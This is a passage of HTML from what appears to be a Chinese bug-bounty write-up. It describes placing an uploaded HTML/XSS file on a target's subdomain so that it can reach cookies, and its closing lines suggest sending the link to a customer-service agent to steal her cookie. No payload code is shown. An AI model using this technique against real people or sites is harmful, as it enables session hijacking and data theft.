BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><img class="rich_pages wxw-img" data-fileid="503042264" data-ratio="0.3967391304347826" data-s="300,640" src="https://mmbiz.qpic.cn/mmbiz_png/5ZACCn1bWEziazmT9E8er0HWIz5xKgkfCibUPfxJCTmNyrhO0QMM6mkb6V4FGW6z2oDZicicUR5rricibHI4QY9bPWtA/640?wx_fmt=png" data-type="png" data-w="736" style="outline: 0px;box-sizing: border-box !important;word-wrap: break-word !important;width: 677px !important;visibility: visible !important;"><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><img class="rich_pages wxw-img" data-fileid="503042262" data-ratio="0.26453143534994067" data-s="300,640" data-type="png" data-w="843" src="https://mmbiz.qpic.cn/mmbiz_png/5ZACCn1bWEziazmT9E8er0HWIz5xKgkfCXBdn7Fto5qQicv1aAWdSSJeXibIEf2YPs9KJQEbor1clbPkgtyjWmF8A/640?wx_fmt=png" style="outline: 0px;box-sizing: border-box !important;word-wrap: break-word !important;width: 677px !important;visibility: visible !important;"><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">等等。<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">第二種方法： 信息收集，收集到了指定的域名(也可以盲猜)。 例子：這里接上第一種方法中的例子，上面是上傳到了阿里云的oss上：https://x-crm.oss-cn-shenzhen.aliyuncs.com,那么其中我們可以盲猜是https://x-crm-oss-cn-shenzhen.xxx.cn這個子域名(因為我上面挖的是某src的漏洞，那肯定是猜該src的域名，該src的主域名為xxx.cn)。 也可以用信息收集來收集到指定的域名，這里我就是通過fofa搜索domain="xxx.cn"收集到的(其實一開始也有盲猜，信息收集證實了我的盲猜是對的)：<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><img class="rich_pages wxw-img" data-fileid="503042263" data-ratio="0.46903820816864294" data-s="300,640" src="https://mmbiz.qpic.cn/mmbiz_png/5ZACCn1bWEziazmT9E8er0HWIz5xKgkfCIffdOOJ6SrMTdzic3BysoFHdXzDrDNV88Hsz2XhT6EAvBKWJDjzeG7Q/640?wx_fmt=png" data-type="png" data-w="759" style="outline: 0px;box-sizing: border-box !important;word-wrap: break-word !important;width: 677px !important;visibility: visible !important;"><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">這樣就從阿里云oss轉換到了該src的子域名上。<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">點擊劫持頁面：<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><img class="rich_pages wxw-img" data-fileid="503042265" data-ratio="0.4994124559341951" data-s="300,640" src="https://mmbiz.qpic.cn/mmbiz_png/5ZACCn1bWEziazmT9E8er0HWIz5xKgkfCkcXxEd88qJTmc1mAAnYqR2rFdxQr5IU0PlVklib9MLIVaXh5T4bQg9w/640?wx_fmt=png" data-type="png" data-w="851" style="outline: 0px;box-sizing: border-box !important;word-wrap: break-word !important;width: 677px !important;visibility: visible !important;"><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">而xss原本在阿里云oss上是沒有cookie的：<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><img class="rich_pages wxw-img" data-fileid="503042266" data-ratio="0.6028938906752411" data-s="300,640" data-type="png" data-w="622" src="https://mmbiz.qpic.cn/mmbiz_png/5ZACCn1bWEziazmT9E8er0HWIz5xKgkfCJNDYBlVnw7lwWtrL2nQTRHXHCIiaxVkqiaADXcPjXOsZdzGvsXWic6Ncg/640?wx_fmt=png" style="outline: 0px;box-sizing: border-box !important;word-wrap: break-word !important;width: 622px !important;visibility: visible !important;"><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">而在該src的子域名下便有cookie了：<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><img class="rich_pages wxw-img" data-fileid="503042267" data-ratio="0.640650406504065" data-s="300,640" data-type="png" data-w="615" src="https://mmbiz.qpic.cn/mmbiz_png/5ZACCn1bWEziazmT9E8er0HWIz5xKgkfC4jOxiciaUsunK2CsTfl6FYoicWyTA6CZahux5gJm4YUUcUJXWUNptk4HQ/640?wx_fmt=png" style="outline: 0px;box-sizing: border-box !important;word-wrap: break-word !important;width: 615px !important;visibility: visible !important;"><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">那么我們就可以去和客服小姐姐聊天了，直接發過去，她成功點擊，就能盜取其cookie了，可能有好東西哦，敏感信息啥的~<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;text-align: right;box-sizing: border-box !important;word-wrap: break-word !important;">侵權請私聊公眾號刪文<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"><img data-croporisrc="https://mmbiz.qpic.cn/mmbiz_jpg/3xxicXNlTXLic5ia2MNtwAvOtCjOnlHEWTBtrs8XuHfZpeIoBhZcC7Lp9V9LgANlV97AgLTSsdZXqkEjz2WXticVfQ/640?wx_fmt=jpeg" data-cropx1="0" data-cropx2="620" data-cropy1="0" data-cropy2="23.333333333333336" data-fileid="503042176" data-ratio="0.037096774193548385" src="https://mmbiz.qpic.cn/mmbiz_jpg/3xxicXNlTXLicjiasf4mjVyxw4RbQt9odm9nxs9434icI9TG8AXHjS3Btc6nTWgSPGkvvXMb7jzFUTbWP7TKu6EJ6g/640?wx_fmt=jpeg" data-type="jpeg" data-w="620" sizes="(max-width: 620px) 100vw, 620px" style="outline: 0px;box-sizing: border-box !important;word-wrap: break-word !important;width: 558px !important;visibility: visible !important;" title="微信公眾號文章素材之分割線大全" width="558"><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"><img class="rich_pages" data-fileid="503042177" data-ratio="0.4" data-s="300,640" src="https://mmbiz.qpic.cn/mmbiz_png/3xxicXNlTXLib0FWIDRa9Kwh52ibXkf9AAkntMYBpLvaibEiaVibzNO1jiaVV7eSibPuMU3mZfCK8fWz6LicAAzHOM8bZUw/640?wx_fmt=jpeg" data-type="jpeg" data-w="1280" style="outline: 0px;letter-spacing: 0.544px;box-sizing: border-box !important;word-wrap: break-word !important;visibility: visible !important;width: 677px !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;text-align: right;box-sizing: border-box !important;word-wrap: break-word !important;"><img class="__bg_gif" data-fileid="503042178" data-ratio="0.15" src="https://mmbiz.qpic.cn/mmbiz_gif/NZycfjXibQzlug4f7dWSUNbmSAia9VeEY0umcbm5fPmqdHj2d12xlsic4wefHeHYJsxjlaMSJKHAJxHnr1S24t5DQ/640?wx_fmt=gif" data-type="gif" data-w="480" data-width="100%" style="outline: 0px;font-size: 13px;letter-spacing: 0.544px;font-family: -apple-system-font, system-ui, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;vertical-align: top;box-sizing: border-box !important;word-wrap: break-word !important;visibility: visible !important;width: 276px !important;">

通過前端JS到后臺文件上傳html實戰